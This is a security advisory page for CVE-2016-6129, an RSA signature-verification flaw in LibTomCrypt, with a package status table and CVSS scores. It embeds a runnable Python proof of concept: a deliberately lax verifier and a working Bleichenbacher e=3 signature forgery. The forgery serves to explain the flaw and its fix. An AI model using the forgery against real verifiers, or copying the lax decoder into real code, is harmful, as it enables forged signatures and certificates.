CVE-2016-6129
Published: 13 February 2017
The rsa_verify_hash_ex function in rsa_verify_hash.c in LibTomCrypt, as used in OP-TEE before 2.2.0, does not validate that the message length is equal to the ASN.1 encoded data length, which makes it easier for remote attackers to forge RSA signatures or public certificates by leveraging a Bleichenbacher signature forgery attack.
From the Ubuntu Security Team
It was discovered that LibTomCrypt incorrectly handled RSA signatures and public certificates: when verifying a PKCS#1 v1.5 signature it did not check that the ASN.1 DigestInfo filled the whole decoded block. An attacker could possibly use this issue to mount a Bleichenbacher signature forgery attack against keys with a small public exponent.
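The following is an added worked example, not code from LibTomCrypt, OP-TEE or Ubuntu. It models the flaw in Python: `digest_from_payload(strict=False)` reproduces the pre-fix behaviour (DER-decode the DigestInfo from the front of the padded block and ignore whatever follows), `strict=True` adds the check the upstream fix introduced (the decoded ASN.1 length must equal the remaining message length), and `forge_signature` carries out the classic Bleichenbacher e=3 cube-root forgery against the lax decoder using nothing but the public modulus. Assumptions: SHA-256 as the hash, public exponent 3, and a constructed 2048-bit `DEMO_N` that is an arbitrary odd integer rather than a real RSA modulus, which is enough because the forgery never uses the private key.

```python
import hashlib
from typing import Optional

# DER-encoded DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1):
# SEQUENCE { AlgorithmIdentifier { id-sha256, NULL }, OCTET STRING (32 bytes) }
SHA256_DIGESTINFO_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")

# Constructed demo public key: an arbitrary odd 2048-bit integer with e = 3.
# Not a real RSA modulus; the forgery below only ever needs n and e.
DEMO_N = int.from_bytes(hashlib.sha512(b"constructed demo modulus").digest() * 4,
                        "big") | (1 << 2047) | 1
DEMO_E = 3

def emsa_pkcs1_v15_encode(digest: bytes, k: int) -> bytes:
    """Honest encoding: EM = 00 01 FF..FF 00 || DigestInfo, exactly k bytes."""
    t = SHA256_DIGESTINFO_PREFIX + digest
    if k < len(t) + 11:
        raise ValueError("modulus too short for PKCS#1 v1.5")
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def strip_pkcs1_padding(em: bytes) -> Optional[bytes]:
    """Remove the 00 01 FF..FF 00 framing (PKCS#1 requires >= 8 FF bytes)."""
    if len(em) < 11 or em[0] != 0x00 or em[1] != 0x01:
        return None
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= len(em) or em[i] != 0x00:
        return None
    return em[i + 1:]

def digest_from_payload(payload: bytes, strict: bool) -> Optional[bytes]:
    """strict=False models the pre-fix decoder: parse the DER SEQUENCE from the
    front, ignore trailing bytes. strict=True models the fix: the decoded
    length must equal the payload length."""
    if len(payload) < 2 or payload[0] != 0x30 or payload[1] >= 0x80:
        return None
    seq_len = 2 + payload[1]                      # short-form DER length
    if seq_len > len(payload):
        return None
    if strict and seq_len != len(payload):
        return None                               # trailing garbage: reject
    seq = payload[:seq_len]
    if seq[:len(SHA256_DIGESTINFO_PREFIX)] != SHA256_DIGESTINFO_PREFIX:
        return None
    digest = seq[len(SHA256_DIGESTINFO_PREFIX):]
    return digest if len(digest) == 32 else None

def verify_em(em: bytes, expected_digest: bytes, strict: bool) -> bool:
    payload = strip_pkcs1_padding(em)
    return payload is not None and \
        digest_from_payload(payload, strict) == expected_digest

def verify(n: int, e: int, sig: int, message: bytes, strict: bool) -> bool:
    """RSA PKCS#1 v1.5 verification of a SHA-256 signature."""
    k = (n.bit_length() + 7) // 8
    if not 0 <= sig < n:
        return False
    em = pow(sig, e, n).to_bytes(k, "big")
    return verify_em(em, hashlib.sha256(message).digest(), strict)

def icbrt_ceil(x: int) -> int:
    """Smallest integer r with r**3 >= x (integer Newton iteration)."""
    if x < 2:
        return x
    r = 1 << ((x.bit_length() + 2) // 3)          # start above the root
    while True:
        nr = (2 * r + x // (r * r)) // 3
        if nr >= r:
            break
        r = nr
    return r if r ** 3 >= x else r + 1

def forge_signature(n: int, message: bytes) -> int:
    """Bleichenbacher (2006) e=3 forgery: block = minimal padding || DigestInfo
    || attacker-chosen bytes; its ceiling cube root, cubed, still matches
    every byte the lax decoder inspects. No private key involved."""
    k = (n.bit_length() + 7) // 8
    t = SHA256_DIGESTINFO_PREFIX + hashlib.sha256(message).digest()
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + t
    garbage_bits = 8 * (k - len(prefix))
    target = int.from_bytes(prefix, "big") << garbage_bits
    s = icbrt_ceil(target)
    if (s ** 3) >> garbage_bits != int.from_bytes(prefix, "big"):
        raise ValueError("modulus too small for the simple cube-root variant")
    return s

def demo(message: bytes = b"transfer 1000 EUR to account 42") -> dict:
    k = (DEMO_N.bit_length() + 7) // 8
    h = hashlib.sha256(message).digest()
    sig = forge_signature(DEMO_N, message)
    return {
        "honest_em_strict": verify_em(emsa_pkcs1_v15_encode(h, k), h, True),
        "forged_vulnerable": verify(DEMO_N, DEMO_E, sig, message, False),
        "forged_fixed": verify(DEMO_N, DEMO_E, sig, message, True),
        "forged_other_message": verify(DEMO_N, DEMO_E, sig, b"other", False),
    }

if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

Running `demo()` shows the honest block accepted by the strict decoder, the forged signature accepted only by the lax one, and the forgery failing for any other message because the hash inside the DigestInfo no longer matches. The simple cube-root variant needs enough attacker-controlled trailing bytes (about two thirds of the modulus) and therefore works for a 2048-bit modulus with SHA-256; for a 1024-bit modulus the forgery needs the more elaborate variants published later, which is why `forge_signature` raises rather than returning a bad value.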
Notes
Author | Note |
---|---|
tyhicks | Per Debian's security tracker, the underlying issue looks to be in libtomcrypt |
Priority
Status
Package | Release | Status |
---|---|---|
libtomcrypt (Launchpad, Ubuntu, Debian) | artful | Ignored (end of life) |
libtomcrypt | bionic | Not vulnerable (1.17-8) |
libtomcrypt | precise | Released (1.17-3.2+deb7u1ubuntu0.1) |
libtomcrypt | trusty | Released (1.17-5ubuntu0.1) |
libtomcrypt | upstream | Needs triage |
libtomcrypt | xenial | Released (1.17-7ubuntu0.1) |
libtomcrypt | yakkety | Ignored (end of life) |
libtomcrypt | zesty | Ignored (end of life) |
Severity score breakdown
Parameter | Value |
---|---|
Base score | 7.5 |
Attack vector | Network |
Attack complexity | Low |
Privileges required | None |
User interaction | None |
Scope | Unchanged |
Confidentiality impact | None |
Integrity impact | High |
Availability impact | None |
Vector | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N |